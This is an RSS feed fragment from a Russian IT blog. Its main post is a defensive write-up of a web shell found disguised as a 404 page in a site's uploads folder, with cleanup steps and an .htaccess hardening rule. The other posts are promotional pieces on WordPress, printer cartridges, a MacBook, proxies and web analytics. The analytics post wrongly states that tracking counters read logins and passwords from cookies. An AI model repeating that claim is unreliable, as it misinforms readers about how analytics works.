<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/wordpress.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7409" src="https://litl-admin.ru/wp-content/uploads/2022/10/wordpress-620x398.png" alt="" width="620" height="398" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/wordpress-620x398.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/wordpress-768x493.png 768w, https://litl-admin.ru/wp-content/uploads/2022/10/wordpress.png 792w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="398"></span></a></p>
<p>Научиться работать с системой поможет <a href="https://wpcustom.ru/uchebnik_po_wordpress/">учебник по WordPress</a>. С его помощью вы узнаете, какие возможности дает платформа для создания классных сайтов совершенно бесплатно. Также в материалах содержится практическая информация о настройках и оптимизации крупных проектов.</p>
<h2>Особенности платформы WordPress</h2>
<p>Система для создания сайтов WordPress с каждым годом становится все популярнее. Это обусловлено следующими плюсами платформы:</p>
<ul>
<li>подходит для создания сайтов любой сложности. Для использования предлагаются десятки тысяч тем, регулярно появляются новые. Это позволяет создавать веб-ресурсы под любые потребности. При этом проекты не будут однообразными: <a href="https://wpcustom.ru/a-feed/">подборка тем для WordPress</a> очень разнообразна;</li>
<li>использовать платформу могут даже те, у кого нет опыта или знаний программирования. Разобраться в функционале достаточно просто — нужно только изучить инструкции;</li>
<li>CMS считается достаточно безопасной и защищенной. Система постоянно обновляется, что позволяет предотвратить угрозу кибер-атаки. Повысить уровень защиты также помогают правильно подобранные плагины;</li>
<li>на платформе используется программное обеспечение с открытым кодом. Это значит, что редактировать, вносить свои изменения может любой разработчик. Благодаря этому система постоянно тестируется и совершенствуется специалистами, работающими на энтузиазме;</li>
<li>сайты, созданные на WordPress, могут без проблем работать даже на недорогом хостинге. Выбирая тариф, важно ориентироваться именно на предполагаемую нагрузку на ресурс. В таком случае он будет работать исправно, без внутренних ошибок.</li>
</ul>
<p>Сайт — современный инструмент маркетинга. С его помощью можно продавать товары, информировать клиентов о действующих акциях и скидках, повысить покупательскую активность, узнаваемость бренда.</p>
<p>Если вы задумываетесь о создании собственного веб-ресурса, обратитесь к платформе WordPress. Здесь есть все необходимые инструменты и настройки для получения действительно качественного и функционального сайта. Разобраться с системой вы сможете даже в том случае, если у вас нет опыта и знаний.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/sajt/sajt-na-wordpress-osobennosti-oformleniya-i-popolneniya-kontentom.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Разгребаем последствия взлома сайта</title>
		<link>https://litl-admin.ru/xaking/razgrebaem-posledstviya-vzloma-sajta.html</link>
					<comments>https://litl-admin.ru/xaking/razgrebaem-posledstviya-vzloma-sajta.html#respond</comments>
		
		
		<pubDate>Tue, 18 Oct 2022 23:08:09 +0000</pubDate>
				<category><![CDATA[Хакинг]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7398</guid>

					<description><![CDATA[Взломали как-то у одних товарищей сайтец. Ну как взломали&#8230; залили туда веб-шелл, случайно обнаружилось, когда проверял их файлы антивирусом Касперского. А как они ко мне попали? Да менял немного код, попросили вписать пару баннеров в кастомный движок, вот я и выкачал архив сайта, чтобы на локальном сервере работать. Ну в общем не суть. Главное, что [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Взломали как-то у одних товарищей сайтец. Ну как взломали&#8230; залили туда веб-шелл, случайно обнаружилось, когда проверял их файлы антивирусом Касперского. А как они ко мне попали? Да менял немного код, попросили вписать пару баннеров в кастомный движок, вот я и выкачал архив сайта, чтобы на локальном сервере работать. Ну в общем не суть. Главное, что обнаружился бэкдор, а это достаточно плохо.</p>
<p>Итак, бэкдор представляет собой файл 01.php, лежащий в каталоге /uploads/ как бы уже намекая путь проникновения.</p>
<p>Обращаюсь к нему и вижу:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/1.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7399" src="https://litl-admin.ru/wp-content/uploads/2022/10/1.png" alt="" width="565" height="411" /><meta itemprop="width" content="565"><meta itemprop="height" content="411"></span></a></p>
<p>Сперва не обратил внимание, ну 404-ая ошибка. Ладно. Хотя странно. Откроем код:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/2.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7400" src="https://litl-admin.ru/wp-content/uploads/2022/10/2-620x371.png" alt="" width="620" height="371" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/2-620x371.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/2-940x563.png 940w, https://litl-admin.ru/wp-content/uploads/2022/10/2-768x460.png 768w, https://litl-admin.ru/wp-content/uploads/2022/10/2.png 1200w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="371"></span></a></p>
<p>Чтоооо? Помимо захардкоженного MD5-хеша (пароль доступа, не root, кстати). Здесь прямым текстом выводится содержимое той самой Not found странички. Аа-аа )) так это залепуха. А вон внизу и инпут для пароля. Ну-ка, проверим:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/3.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7401" src="https://litl-admin.ru/wp-content/uploads/2022/10/3.png" alt="" width="565" height="326" /><meta itemprop="width" content="565"><meta itemprop="height" content="326"></span></a></p>
<p>И правда) Поле для ввода пароля есть. Попробовал побрутить MD5-хеш на hashcat, но ничего не подобралось до 7 знаков, а дальше сроки выросли очень сильно. Решено было не мучать железо, а поменять захардкоженый хеш на что-нибудь известное прямо в бэкдор-скрипте <img src="https://litl-admin.ru/wp-content/themes/root/images/smilies/smile.png" alt=":)" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
<div style="clear:both; margin-top:0em; margin-bottom:1em;"><a href="https://litl-admin.ru/utility/rabota-s-programmoj-hashcat-hashcat-gui-oclhashcat.html" target="_blank" class="IRPP_minimalist"><style> .IRPP_minimalist { padding:0px; margin: 0; padding-top:1em!important; padding-bottom:1em!important; width:100%; display: block; font-weight:bold; background-color:#eaeaea; border:0!important; border-left:4px solid #34495E!important; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -moz-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -o-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); -webkit-box-shadow: 0 1px 2px rgba(0, 0, 0, 0.17); text-decoration:none; } .IRPP_minimalist:active, .IRPP_minimalist:hover { opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; text-decoration:none; } .IRPP_minimalist { transition: background-color 250ms; webkit-transition: background-color 250ms; opacity: 1; transition: opacity 250ms; webkit-transition: opacity 250ms; } .IRPP_minimalist .ctaText { font-weight:bold; color:inherit; text-decoration:none; font-size: 16px; } .IRPP_minimalist .postTitle { color:#000000; text-decoration: underline!important; font-size: 16px; } .IRPP_minimalist:hover .postTitle { text-decoration: underline!important; } </style><div style="padding-left:1em; padding-right:1em;"><span class="ctaText">Читать подробнее: </span>&nbsp; <span class="postTitle">Работа с программой hashcat (hashcat gui и oclhashcat)</span></div></a></div>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/4.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7402" src="https://litl-admin.ru/wp-content/uploads/2022/10/4-620x556.jpg" alt="" width="620" height="556" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/4-620x556.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/10/4.jpg 703w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="556"></span></a></p>
<p>Вот такой вот веб-шелл&#8230; Чтож. Примечательно то, что он не англоязычный, загуглил пару характерных фраз из исходника:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-18_18-11-23.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7403" src="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-18_18-11-23-620x285.png" alt="" width="620" height="285" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-18_18-11-23-620x285.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-18_18-11-23.png 686w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="285"></span></a>Определило Индонезийский язык. Первый намёк принят.</p>
<p>Следующая часть исходника была закодирована в base64 &#8211; один из любимых методов злоумышленников. Раскодируем прямо в Notepad++:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/6.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7404" src="https://litl-admin.ru/wp-content/uploads/2022/10/6-620x157.png" alt="" width="620" height="157" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/6-620x157.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/6.png 745w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="157"></span></a></p>
<p>Так как в исходнике была функция mail, поднимем почтовые логи и грепаем этот почтовый адрес. Выходим на IP-шник:</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-18_18-10-56.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-full wp-image-7405" src="https://litl-admin.ru/wp-content/uploads/2022/10/2022-10-18_18-10-56.png" alt="" width="536" height="432" /><meta itemprop="width" content="536"><meta itemprop="height" content="432"></span></a></p>
<p>Снова Индонезия.</p>
<p>Что ещё есть в исходнике?</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/7.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7406" src="https://litl-admin.ru/wp-content/uploads/2022/10/7-620x151.png" alt="" width="620" height="151" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/7-620x151.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/7-768x187.png 768w, https://litl-admin.ru/wp-content/uploads/2022/10/7.png 844w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="151"></span></a></p>
<p>Ссылки на какой-то хак-портал, где публикуют свои дефейсы куча киберпреступников. Есть и удобный поисковичок.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/10/8.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7407" src="https://litl-admin.ru/wp-content/uploads/2022/10/8-620x554.png" alt="" width="620" height="554" srcset="https://litl-admin.ru/wp-content/uploads/2022/10/8-620x554.png 620w, https://litl-admin.ru/wp-content/uploads/2022/10/8-768x687.png 768w, https://litl-admin.ru/wp-content/uploads/2022/10/8.png 908w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="554"></span></a></p>
<h3>Устраняем последствия</h3>
<p><strong>Вычистим все скрипты</strong></p>
<p>Выполнил поиск подозрительных имён файлов, скриптов. А также всех файлов, созданных в интересующие даты. Удалил.</p>
<p><strong>Запретим выполнение скриптов из каталога uploads</strong></p>
<p>Создал .htaccess следующего содержания, залил в каталог. Проверил работу.</p>
<p><code>php_flag engine 0<br />
RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html<br />
AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html</code></p>
<p>Вот такая вот история. Очевидно, в самописном движке сайта есть какая-то уязвимость, которую обнаружили злоумышленники. И будут пытаться пробивать дальше. Хорошо, если единственная возможность записи будет только в uploads, таким образом по крайней мере PHP-бэкдоры удастся придушить. Будем посмотреть.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/xaking/razgrebaem-posledstviya-vzloma-sajta.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Что делать с засохшим картриджем?</title>
		<link>https://litl-admin.ru/zhelezo/chto-delat-s-zasoxshim-kartridzhem.html</link>
					<comments>https://litl-admin.ru/zhelezo/chto-delat-s-zasoxshim-kartridzhem.html#respond</comments>
		
		
		<pubDate>Fri, 09 Sep 2022 23:31:58 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<category><![CDATA[Железо]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7394</guid>

					<description><![CDATA[Любые расходные материалы со временем теряют свои свойства. Чернила в картридже — не исключение. Определить, что началось высыхание, можно по трём основным признакам: цвет текста и изображений стал менее насыщенным; устройство перестало печатать; после недавней замены краски прибор сигнализирует, что она закончилась. Восстановить засохший картридж можно нескольким способами. Эксперты компании «Расход» подробно расскажут о каждом [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Любые расходные материалы со временем теряют свои свойства. Чернила в картридже — не исключение. Определить, что началось высыхание, можно по трём основным признакам:</p>
<ul>
<li>цвет текста и изображений стал менее насыщенным;</li>
<li>устройство перестало печатать;</li>
<li>после недавней замены краски прибор сигнализирует, что она закончилась.</li>
</ul>
<p>Восстановить засохший картридж можно нескольким способами. Эксперты <a href="https://rashod.ru/">компании «Расход»</a> подробно расскажут о каждом из них.</p>
<h2>Использование разжижителя</h2>
<p>Расходник, неспособный выполнять свои функции, постепенно скапливается в выходных соплах. Чтобы их прочистить и вернуть чернила в исходное состояние, используют специальную жидкость. Её объём зависит от количества краски, которая находится внутри картриджа. Найти разжижитель в продаже не так просто. Однако его вполне можно заменить подручными средствами.</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/09/printer.jpg" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7395" src="https://litl-admin.ru/wp-content/uploads/2022/09/printer-620x437.jpg" alt="" width="620" height="437" srcset="https://litl-admin.ru/wp-content/uploads/2022/09/printer-620x437.jpg 620w, https://litl-admin.ru/wp-content/uploads/2022/09/printer.jpg 640w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="437"></span></a></p>
<h2>Бытовые способы</h2>
<p>Восстановление работоспособности картриджа в домашних условиях также начинается с очищения сопла. Но на этот раз уже с помощью растворителя. Проводить процедуру нужно очень аккуратно, чтобы он не попал внутрь. Для разжижения существует несколько вариантов раствора:</p>
<ul>
<li>нейтральный — смесь спирта, воды и глицерина. Подойдёт для очистки всех расходников.</li>
<li>щелочной — соединение спирта, аммиака, воды и глицерина. Используют для расходников фирм Epson и Canon.</li>
<li>кислотный — смесь спирта, уксусной кислоты и дистиллированной воды. Можно применять для большинства картриджей.</li>
</ul>
<p>Если химические эксперименты не ваша сильная сторона, можно купить средство «Мистер Мускул» голубого цвета. Он не хуже домашних составов справится со своей задачей.</p>
<p>В качестве альтернативы подойдёт очистка паром. Чтобы получить результат, достаточно будет 5-10 секунд подержать сопло у носика кипящего чайника или парогенератора.</p>
<h2>Рекомендации по чистке</h2>
<ul>
<li>Первый этап — очищение сопла. Без него засохшие чернила не позволят составу проникнуть внутрь.</li>
<li>Выбирайте только проверенные растворы и средства. Отдавайте предпочтение специализированным составам.</li>
<li>Проводите очищение в средствах индивидуальной защиты. Используйте респиратор, перчатки, а также очки.</li>
<li>Не переворачивайте контейнер с краской. Из него может вытечь оставшаяся жидкость.</li>
</ul>
<h2>Профилактика засыхания</h2>
<p>Бывают ситуации, когда даже профессиональное средство не способно справиться с проблемой. Тогда единственным возможным вариантом станет замена расходного материала.</p>
<p>Чтобы избежать такого развития событий, соблюдайте несколько правил:</p>
<ul>
<li>выбирайте картриджи с максимальным сроком годности;</li>
<li>не размещайте принтеры и другие печатные устройства рядом с батареями, тепловыми пушками, обогревателями;</li>
<li>защищайте технику от прямого попадания солнечных лучей;</li>
<li>избегайте негативного влияния сквозняков, кондиционеров и вентиляции;</li>
<li>не герметизируйте сопла.</li>
</ul>
<p>Лучше всего размещать печатную технику в затемнённых и прохладных местах. Если вы понимаете, что не будете использовать оборудование продолжительное время, закройте отверстия для краски специальными пробками. Это позволит сохранить расходники в рабочем состоянии и избавит вас от необходимости проводить процедуру чистки или замены.</p>
<p>Источник: <a href="https://rashod.ru/">https://rashod.ru/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/zhelezo/chto-delat-s-zasoxshim-kartridzhem.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Apple MacBook Air M2 как ноутбук для упрощения жизни</title>
		<link>https://litl-admin.ru/zhelezo/apple-macbook-air-m2-kak-noutbuk-dlya-uproshheniya-zhizni.html</link>
					<comments>https://litl-admin.ru/zhelezo/apple-macbook-air-m2-kak-noutbuk-dlya-uproshheniya-zhizni.html#respond</comments>
		
		
		<pubDate>Fri, 09 Sep 2022 23:25:18 +0000</pubDate>
				<category><![CDATA[Для коллег]]></category>
		<category><![CDATA[Железо]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7393</guid>

					<description><![CDATA[Ноутбук — современный вид техники, который значительно упрощает жизнь современного человека. Устройства представлены в большом ассортименте. Модели отличаются друг от друга по техническим характеристиками, производительности, дизайну. Если вы хотите приобрести мощный и функциональный ноутбук, обратите внимание на модель Apple MacBook Air M2. Поближе ознакомиться с устройством можно на сайте http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/. Возможности MacBook Air M2 MacBook Air [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Ноутбук — современный вид техники, который значительно упрощает жизнь современного человека. Устройства представлены в большом ассортименте. Модели отличаются друг от друга по техническим характеристиками, производительности, дизайну.</p>
<p>Если вы хотите приобрести мощный и функциональный ноутбук, обратите внимание на модель Apple MacBook Air M2. Поближе ознакомиться с устройством можно на сайте <a href="http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/">http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/</a>.</p>
<h2>Возможности MacBook Air M2</h2>
<p>MacBook Air M2 — высокотехнологичное устройство. С его помощью можно решать самые разные задачи. Например, это касается творческих идей. Ноутбук поможет:</p>
<ul>
<li>освоить цифровое рисование. С его помощью реально создать настоящие шедевры для последующего использования в играх, комиксах;</li>
<li>записать и обработать музыку. MacBook Air M2 с легкостью справляется с тяжелыми приложениями, созданными для работы с композициями. Это позволит вам в полной мере реализовать свой потенциал;</li>
<li>проводить качественную ретушь. На все команды устройство реагирует быстро, способно справляться даже с тяжелой графикой. Это особенно полезно будет для фотографов, видеографов, режиссеров.</li>
</ul>
<p>MacBook Air M2 также можно использовать для выполнения рабочих обязанностей (составления таблиц, отчетов, презентаций), написания приложений, создания сайтов, учебы. Ноутбук отличается высоким уровнем производительности, поэтому справится с любыми математическими вычислениями.</p>
<h3>Характеристики MacBook Air M2</h3>
<p>Ценится устройство в первую очередь за свои безупречные технические характеристики:</p>
<ul>
<li>расширенный объем SSD-накопителя (возможны варианты от 256 Гб до 2 Тб);</li>
<li>пропускная способность до 100 Гбит/сек;</li>
<li>поддержка функции быстрой зарядки;</li>
<li>до 15 часов в автономном режиме работы;</li>
<li>4 новых динамика, с поддержкой Spatial Audio и видео с Dolby Atmos;</li>
<li>поддержка связи Wi-Fi 6.</li>
</ul>
<p>MacBook Air M2 — стильный и функциональный ноутбук, который подарит вам максимальный комфорт от использования. Устройство способно справиться с большими нагрузками, моментально реагирует на все задачи. Модель подойдет для творческого хобби, работы, учебы или игр. Справится с любой графикой и приложениями. Посмотреть устройства, доступные для заказа, можно на сайте <a href="http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/">http://apple-rostov.com/katalog/macbook/apple-macbook-air-m2-2022/</a>.</p>
<p>Хороший выбор — макбук на 1 Тб. Тогда у вас будет точно достаточно места на устройстве для хранения всей важной информации. Оформить заказ с доставкой можно онлайн.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/zhelezo/apple-macbook-air-m2-kak-noutbuk-dlya-uproshheniya-zhizni.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Как собрать ключевые фразы в WordStat, будучи в другой стране?</title>
		<link>https://litl-admin.ru/seo/kak-sobrat-klyuchevye-frazy-v-wordstat-buduchi-v-drugoj-strane.html</link>
					<comments>https://litl-admin.ru/seo/kak-sobrat-klyuchevye-frazy-v-wordstat-buduchi-v-drugoj-strane.html#respond</comments>
		
		
		<pubDate>Fri, 19 Aug 2022 01:35:58 +0000</pubDate>
				<category><![CDATA[SEO]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7390</guid>

					<description><![CDATA[СЕО-специалисты, чтобы предлагать качественные и эффективные инструменты продвижения ресурсов в интернете, используют большое количество инструментов. Так, для грамотного продвижения необходимо, например, собрать ключевые фразы в WordStat или в аналогичных сервисах. Это не так сложно, если вы находитесь в той же стране, где осуществляется продвижения ресурса. Но что делать, если вы за границей? Сложность работы в [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>СЕО-специалисты, чтобы предлагать качественные и эффективные инструменты продвижения ресурсов в интернете, используют большое количество инструментов. Так, для грамотного продвижения необходимо, например, собрать ключевые фразы в WordStat или в аналогичных сервисах. Это не так сложно, если вы находитесь в той же стране, где осуществляется продвижения ресурса. Но что делать, если вы за границей?</p>
<p><a href="https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-19_12-32-57.png" rel="lightbox"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="aligncenter size-medium wp-image-7391" src="https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-19_12-32-57-620x412.png" alt="" width="620" height="412" srcset="https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-19_12-32-57-620x412.png 620w, https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-19_12-32-57-768x510.png 768w, https://litl-admin.ru/wp-content/uploads/2022/08/2022-08-19_12-32-57.png 805w" sizes="(max-width: 620px) 100vw, 620px" /><meta itemprop="width" content="620"><meta itemprop="height" content="412"></span></a></p>
<h2>Сложность работы в WordStat из другой страны</h2>
<p>Важно понимать, что поисковые сервисы принимают во внимание страну, из которой осуществляется запрос. Например, выдача по ключу «ремонт стиральных машин» будет абсолютно разной в Украине, Беларуси, Казахстане, Российской Федерации и так далее. Если же у СЕО-шника стоит задача собрать ключи и продвинуть ресурс в Казахстане, находясь при этом в другой стране, важно использовать прокси сервер Казахстана.</p>
<p>Принцип очень простой. Прокси сервер подменяет IP адрес. В данном случае – на казахский. В итоге специалист получает нужные данные и имеет все возможности для эффективной работы над проектом. Такой же принцип и при работе с другими странами, с другими ресурсами. Главное – найти надежный прокси, который будет стабильно и быстро работать. В интернете есть много бесплатных прокси. Но все они имеют низкие показатели, так как давно заблокированы многими системами или же используются одновременно десятками и сотнями людей.</p>
<h2>ShopProxy: надежность и удобство</h2>
<p>Вы можете приобрести прокси сервер <a href="https://shopproxy.net/">по ссылке shopproxy.net</a> &#8211; это официальная страница магазина ShopProxy, который с 2015 года предоставляет качественный и удобный сервис по аренде IP адресов разных стран. Ключевыми преимуществами магазина являются такие моменты:</p>
<ul>
<li>Большой выбор прокси серверов разных стран;</li>
<li>Только быстрые и стабильные соединения, которые позволят активно и комфортно работать;</li>
<li>Автоматизированный личный кабинет, совершающий все задачи в любое время суток;</li>
<li>Профессиональная круглосуточная поддержка, которая выслушает и поможет решить технические и финансовые вопросы, связанные с работой сервиса;</li>
<li>Доступные тарифные планы, которые радуют низкими ценами и большим выбором.</li>
</ul>
<p>Если вы СЕО-шник, работайте из любой точки мира эффективно и удобно. Покупайте недорогие прокси сервера для парсинга и сбора ключевых запросов. Используйте интернет без ограничений.</p>
<p>Дополнительная информация доступна на интернет-ресурсе https://www.shopproxy.net/</p>
]]></content:encoded>
					
					<wfw:commentRss>https://litl-admin.ru/seo/kak-sobrat-klyuchevye-frazy-v-wordstat-buduchi-v-drugoj-strane.html/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			<dc:creator>Seqular</dc:creator></item>
		<item>
		<title>Сквозная аналитика: что это такое, для чего она нужна?</title>
		<link>https://litl-admin.ru/seo/skvoznaya-analitika-chto-eto-takoe-dlya-chego-ona-nuzhna.html</link>
					<comments>https://litl-admin.ru/seo/skvoznaya-analitika-chto-eto-takoe-dlya-chego-ona-nuzhna.html#respond</comments>
		
		
		<pubDate>Fri, 12 Aug 2022 05:15:46 +0000</pubDate>
				<category><![CDATA[SEO]]></category>
		<guid isPermaLink="false">https://litl-admin.ru/?p=7386</guid>

					<description><![CDATA[Любому бизнесу требуются продажи. Для этого владельцы повышают узнаваемость бренда с помощью рекламных и маркетинговых методов. Сквозная аналитика способствует эффективному распределению бюджета. Задачи данного способа заключаются в сведении информации о продажах в одно место и последующем анализе затрат. Кому нужна сквозная аналитика СА стоит внедрять, если: Используется много каналов привлечения. В системе применяется CRM, которая [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Любому бизнесу требуются продажи. Для этого владельцы повышают узнаваемость бренда с помощью рекламных и маркетинговых методов. Сквозная аналитика способствует эффективному распределению бюджета. Задачи данного способа заключаются в сведении информации о продажах в одно место и последующем анализе затрат.</p>
<h2>Кому нужна сквозная аналитика</h2>
<p><a href="https://www.calltouch.ru/" target="_blank" rel="noopener"><span itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" loading="lazy" decoding="async" class="wp-image-7387 size-thumbnail alignright" src="https://litl-admin.ru/wp-content/uploads/2022/08/32069eb6bb6805473eb6ad7cbb504c43-300x300.jpg" alt="" width="300" height="300" srcset="https://litl-admin.ru/wp-content/uploads/2022/08/32069eb6bb6805473eb6ad7cbb504c43-300x300.jpg 300w, https://litl-admin.ru/wp-content/uploads/2022/08/32069eb6bb6805473eb6ad7cbb504c43-80x80.jpg 80w, https://litl-admin.ru/wp-content/uploads/2022/08/32069eb6bb6805473eb6ad7cbb504c43-120x120.jpg 120w" sizes="(max-width: 300px) 100vw, 300px" /><meta itemprop="width" content="300"><meta itemprop="height" content="300"></span></a><br />
СА стоит внедрять, если:</p>
<ul>
<li>Используется много каналов привлечения.</li>
<li>В системе применяется CRM, которая собирает информацию для расчёта конверсий, загружает сведения, изучает отчёты по веб-аналитике.</li>
<li>На бизнес выделен высокий маркетинговый бюджет. Продажи ведутся в больших оборотах.</li>
</ul>
<p>Надо помнить, что сквозная аналитика не решит все проблемы.</p>
<p>Инструмент только помогает управлять рекламой, оптимизировать бюджет и подталкивает к правильным идеям.</p>
<h2>Как действует сквозная аналитика</h2>
<p>На страницах устанавливают модуль-счётчик. Цель – отслеживание действий пользователей: заполнение заявок, добавление товара в корзину, покупка. Счётчик сканирует cookies файлы, которые содержат данные о посещённых сайтах, логины, пароли и cid. Таким образом, собранная информация объединяется.</p>
<p>Люди не совершают покупки на первой же попавшейся площадке. Они заходят с разных источников, переключаются между сайтами. Номер ID – уникальный, он присваивается пользователю и не меняется. Поэтому <a href="https://www.calltouch.ru/product/skvoznaya-analitika/" target="_self" rel="noopener">сервис сквозной аналитики</a> легко определяют то, что сайт посещает один и тот же человек. Сквозная аналитика рассчитывает влияние маркетинговых каналов на конверсии и продажи. Также это способствует лучшему пониманию пути клиента.</p>
<h2>Какую пользу можно извлечь из сквозной аналитики</h2>
<p>По сравнению с Яндекс.Метрикой и Google Analytics, сквозная аналитика учитывает всю статистику, в том числе офлайн-покупки, отказы и возвраты. Итоговые данные по выручке и марже будут гораздо правдивее. СА показывает весь путь пользователя, начиная с первого захода на площадку и заканчивая непосредственно покупкой товара.</p>
<p>Система сквозной аналитики находит информацию в различных источниках: рекламные кабинеты, CRM, сайт. При этом учитываются основные показатели эффективности, среди которых присутствуют:</p>
<ul>
<li>CTR – процентное соотношение числа кликов на объявление к количеству его показов, то есть можно посмотреть, сколько пользователей увидели публикацию и нажали на неё.</li>
<li>CPC – плата за клики, характеристика помогает узнать среднюю стоимость одного клика. Сумма зависит от местоположения, времени, конкуренции.</li>
<li>CPL – стоимость одного лида. Модель подсчитывает, во сколько обошёлся каждый потенциальный покупатель. Как найти: взять общую сумму расходов и разделить на количество лидов.</li>
<li>ROI – финансовый коэффициент, который определяет доходность или убыточность бизнеса. При расчётах учитывают сумму вложений или инвестиций.</li>
</ul>
<p>Сквозная аналитика позволяет определить, какую лучше использовать маркетинговую кампанию. Некоторые рекламные проекты становятся очень прибыльными, а другие наоборот, только тратят бюджет и совсем не приводят клиентов.</p>
]]></content:encoded>
					
